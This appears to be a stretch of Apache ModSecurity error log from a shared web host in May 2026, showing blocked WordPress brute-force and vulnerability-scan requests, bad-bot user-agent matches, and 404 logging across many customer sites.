[Tue May 26 16:10:28.692328 2026] [security2:error] [pid 773493:tid 773644] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4nJgy-Vk4jSdqTCRNagAAAJo"]
[Tue May 26 16:10:30.968794 2026] [security2:error] [pid 773493:tid 773641] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4npgy-Vk4jSdqTCRNtgAAAJc"]
[Tue May 26 16:10:32.409118 2026] [security2:error] [pid 773493:tid 773643] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4n5gy-Vk4jSdqTCRN8QAAAJk"]
[Tue May 26 16:10:32.943827 2026] [security2:error] [pid 773493:tid 773738] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV4n5gy-Vk4jSdqTCRN4AAA-HA"]
[Tue May 26 16:10:34.030891 2026] [security2:error] [pid 773493:tid 773540] [remote 163.61.60.30:42098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahV4oZgy-Vk4jSdqTCROGAAAui4"]
[Tue May 26 16:10:34.471796 2026] [security2:error] [pid 773493:tid 773726] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4opgy-Vk4jSdqTCROJgAAAOw"]
[Tue May 26 16:10:35.912774 2026] [core:error] [pid 773493:tid 773658] [client 74.7.230.41:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:10:35.912794 2026] [core:error] [pid 773493:tid 773658] [client 74.7.230.41:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:10:35.912916 2026] [security2:error] [pid 773493:tid 773658] [client 74.7.230.41:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "consultrgb.com"] [uri "/index.php"] [unique_id "ahV4o5gy-Vk4jSdqTCROTAAAAKg"]
[Tue May 26 16:10:35.913441 2026] [security2:error] [pid 773493:tid 773734] [client 74.7.230.41:53738] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "consultrgb.com"] [uri "/robots.txt"] [unique_id "ahV4o5gy-Vk4jSdqTCROSgAA9D0"]
[Tue May 26 16:10:36.079647 2026] [security2:error] [pid 773493:tid 773628] [client 74.7.175.168:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "consultio.taotechservices.com"] [uri "/index.php"] [unique_id "ahV4o5gy-Vk4jSdqTCROPQAAAIo"]
[Tue May 26 16:10:36.080615 2026] [security2:error] [pid 773493:tid 773697] [client 74.7.175.168:34532] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "consultio.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahV4o5gy-Vk4jSdqTCROOwAAzy8"]
[Tue May 26 16:10:36.682978 2026] [security2:error] [pid 773493:tid 773657] [client 106.219.85.83:27475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4pJgy-Vk4jSdqTCROYAAAAKc"]
[Tue May 26 16:10:36.683093 2026] [security2:error] [pid 773493:tid 773657] [client 106.219.85.83:27475] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4pJgy-Vk4jSdqTCROYAAAAKc"]
[Tue May 26 16:10:37.072704 2026] [security2:error] [pid 773493:tid 773654] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4pJgy-Vk4jSdqTCROXwAAAKQ"]
[Tue May 26 16:10:39.781517 2026] [security2:error] [pid 773493:tid 773648] [client 103.44.52.196:37138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4p5gy-Vk4jSdqTCROmgAAAJ4"]
[Tue May 26 16:10:39.781681 2026] [security2:error] [pid 773493:tid 773648] [client 103.44.52.196:37138] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4p5gy-Vk4jSdqTCROmgAAAJ4"]
[Tue May 26 16:10:40.327176 2026] [security2:error] [pid 773493:tid 773683] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4p5gy-Vk4jSdqTCROpgAAAME"]
[Tue May 26 16:10:40.500126 2026] [security2:error] [pid 773493:tid 773570] [remote 74.7.241.58:48316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV4qJgy-Vk4jSdqTCROtAAA1Ew"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/bootstrap
[Tue May 26 16:10:41.143215 2026] [security2:error] [pid 773493:tid 773633] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4qJgy-Vk4jSdqTCROvQAAAI8"]
[Tue May 26 16:10:41.687537 2026] [security2:error] [pid 773493:tid 773676] [client 51.68.111.216:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "stockmarketanalysis.in"] [uri "/robots.txt"] [unique_id "ahV4qZgy-Vk4jSdqTCROxwAAALo"]
[Tue May 26 16:10:41.687746 2026] [security2:error] [pid 773493:tid 773676] [client 51.68.111.216:0] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "stockmarketanalysis.in"] [uri "/robots.txt"] [unique_id "ahV4qZgy-Vk4jSdqTCROxwAAALo"]
[Tue May 26 16:10:42.330703 2026] [security2:error] [pid 773493:tid 773709] [client 114.119.133.125:63573] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "thegoodsporting.com"] [uri "/blog-post3.php"] [unique_id "ahV4qpgy-Vk4jSdqTCRO1wAAANs"], referer: https://thegoodsporting.com/
[Tue May 26 16:10:43.314524 2026] [security2:error] [pid 773493:tid 773683] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4qpgy-Vk4jSdqTCRO6AAAAME"]
[Tue May 26 16:10:45.212736 2026] [security2:error] [pid 773493:tid 773747] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4rJgy-Vk4jSdqTCRPDgAAAQE"]
[Tue May 26 16:10:46.759936 2026] [security2:error] [pid 773493:tid 773722] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4rpgy-Vk4jSdqTCRPKgAAAOg"]
[Tue May 26 16:10:47.244388 2026] [security2:error] [pid 773493:tid 773675] [client 106.219.85.83:27403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4r5gy-Vk4jSdqTCRPPQAAALk"]
[Tue May 26 16:10:47.244638 2026] [security2:error] [pid 773493:tid 773675] [client 106.219.85.83:27403] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4r5gy-Vk4jSdqTCRPPQAAALk"]
[Tue May 26 16:10:49.047512 2026] [security2:error] [pid 773493:tid 773649] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4sJgy-Vk4jSdqTCRPVQAAAJ8"]
[Tue May 26 16:10:50.331975 2026] [security2:error] [pid 773493:tid 773639] [client 103.44.52.196:56346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4spgy-Vk4jSdqTCRPfQAAAJU"]
[Tue May 26 16:10:50.332116 2026] [security2:error] [pid 773493:tid 773639] [client 103.44.52.196:56346] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4spgy-Vk4jSdqTCRPfQAAAJU"]
[Tue May 26 16:10:51.407980 2026] [security2:error] [pid 773493:tid 773735] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4spgy-Vk4jSdqTCRPgwAAAPU"]
[Tue May 26 16:10:53.521095 2026] [security2:error] [pid 773493:tid 773629] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4tZgy-Vk4jSdqTCRPswAAAIs"]
[Tue May 26 16:10:54.426961 2026] [security2:error] [pid 773493:tid 773690] [client 161.129.168.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV4tJgy-Vk4jSdqTCRPrgAAAMg"]
[Tue May 26 16:10:55.566785 2026] [security2:error] [pid 773493:tid 773716] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4t5gy-Vk4jSdqTCRP0gAAAOI"]
[Tue May 26 16:10:56.927476 2026] [security2:error] [pid 773493:tid 773629] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4uJgy-Vk4jSdqTCRP6QAAAIs"]
[Tue May 26 16:10:58.044635 2026] [security2:error] [pid 773493:tid 773728] [client 106.219.85.83:21798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4uZgy-Vk4jSdqTCRQCAAAAO4"]
[Tue May 26 16:10:58.044831 2026] [security2:error] [pid 773493:tid 773728] [client 106.219.85.83:21798] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4uZgy-Vk4jSdqTCRQCAAAAO4"]
[Tue May 26 16:10:58.578513 2026] [security2:error] [pid 773493:tid 773526] [remote 160.250.186.220:34500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahV4upgy-Vk4jSdqTCRQEgAA-CA"]
[Tue May 26 16:10:59.128271 2026] [security2:error] [pid 773493:tid 773630] [client 66.249.89.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahV4upgy-Vk4jSdqTCRQHwAAAIw"]
[Tue May 26 16:10:59.780347 2026] [security2:error] [pid 773493:tid 773624] [client 74.7.244.52:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "mail.taotechservices.com"] [uri "/index.php"] [unique_id "ahV4u5gy-Vk4jSdqTCRQKgAAAIY"]
[Tue May 26 16:10:59.780375 2026] [security2:error] [pid 773493:tid 773624] [client 74.7.244.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "mail.taotechservices.com"] [uri "/index.php"] [unique_id "ahV4u5gy-Vk4jSdqTCRQKgAAAIY"]
[Tue May 26 16:10:59.797191 2026] [security2:error] [pid 773493:tid 773683] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4u5gy-Vk4jSdqTCRQLwAAAME"]
[Tue May 26 16:10:59.815278 2026] [security2:error] [pid 773493:tid 773706] [client 74.7.244.52:57486] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "mail.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahV4u5gy-Vk4jSdqTCRQKAAA2HY"]
[Tue May 26 16:11:00.788085 2026] [security2:error] [pid 773493:tid 773638] [client 103.44.52.196:41032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4vJgy-Vk4jSdqTCRQUQAAAJQ"]
[Tue May 26 16:11:00.788191 2026] [security2:error] [pid 773493:tid 773638] [client 103.44.52.196:41032] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4vJgy-Vk4jSdqTCRQUQAAAJQ"]
[Tue May 26 16:11:00.878755 2026] [security2:error] [pid 773493:tid 773670] [client 185.191.171.11:16670] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahV4vJgy-Vk4jSdqTCRQVAAAALQ"]
[Tue May 26 16:11:00.878907 2026] [security2:error] [pid 773493:tid 773670] [client 185.191.171.11:16670] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahV4vJgy-Vk4jSdqTCRQVAAAALQ"]
[Tue May 26 16:11:00.892221 2026] [security2:error] [pid 773493:tid 773733] [client 74.7.244.52:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "taotechservices.com"] [uri "/index.php"] [unique_id "ahV4vJgy-Vk4jSdqTCRQQQAAAPM"], referer: https://mail.taotechservices.com/robots.txt
[Tue May 26 16:11:00.893090 2026] [security2:error] [pid 773493:tid 773628] [client 74.7.244.52:57488] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "taotechservices.com"] [uri "/"] [unique_id "ahV4vJgy-Vk4jSdqTCRQPAAAimA"], referer: https://mail.taotechservices.com/robots.txt
[Tue May 26 16:11:01.063849 2026] [security2:error] [pid 773493:tid 773692] [client 77.68.83.86:53044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ucdc.co.in"] [uri "/images/images/cache.php"] [unique_id "ahV4vZgy-Vk4jSdqTCRQWQAAAMo"], referer: www.google.com
[Tue May 26 16:11:01.702100 2026] [security2:error] [pid 773493:tid 773644] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4vZgy-Vk4jSdqTCRQZAAAAJo"]
[Tue May 26 16:11:02.515903 2026] [security2:error] [pid 773493:tid 773697] [client 74.7.241.147:41354] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "consutio.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahV4vpgy-Vk4jSdqTCRQfAAAAM8"]
[Tue May 26 16:11:03.877841 2026] [security2:error] [pid 773493:tid 773688] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4v5gy-Vk4jSdqTCRQlQAAAMY"]
[Tue May 26 16:11:05.577809 2026] [security2:error] [pid 773493:tid 773654] [client 46.189.183.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4wZgy-Vk4jSdqTCRQuAAAAKQ"]
[Tue May 26 16:11:05.801054 2026] [security2:error] [pid 773493:tid 773704] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4wZgy-Vk4jSdqTCRQwgAAANY"]
[Tue May 26 16:11:07.370406 2026] [security2:error] [pid 773493:tid 773716] [client 18.193.252.127:48902] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV4w5gy-Vk4jSdqTCRQ7gAAAOI"], referer: https://thegoodsporting.com
[Tue May 26 16:11:08.315105 2026] [security2:error] [pid 773493:tid 773665] [client 114.119.128.56:65093] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV4xJgy-Vk4jSdqTCRRAgAAAK8"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fcategory&path=72_76_120
[Tue May 26 16:11:08.336843 2026] [security2:error] [pid 773493:tid 773633] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4w5gy-Vk4jSdqTCRQ-wAAAI8"]
[Tue May 26 16:11:08.480500 2026] [security2:error] [pid 773493:tid 773653] [client 106.219.85.83:26962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4xJgy-Vk4jSdqTCRRBgAAAKM"]
[Tue May 26 16:11:08.480638 2026] [security2:error] [pid 773493:tid 773653] [client 106.219.85.83:26962] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4xJgy-Vk4jSdqTCRRBgAAAKM"]
[Tue May 26 16:11:08.990122 2026] [security2:error] [pid 773493:tid 773715] [client 77.68.83.86:55104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ucdc.co.in"] [uri "/images/images/cache.php"] [unique_id "ahV4xJgy-Vk4jSdqTCRRFAAAAOE"], referer: www.google.com
[Tue May 26 16:11:09.831016 2026] [security2:error] [pid 773493:tid 773675] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4xZgy-Vk4jSdqTCRRIgAAALk"]
[Tue May 26 16:11:10.195856 2026] [security2:error] [pid 773493:tid 773547] [remote 46.101.75.237:36946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahV4xpgy-Vk4jSdqTCRRLQABAzU"]
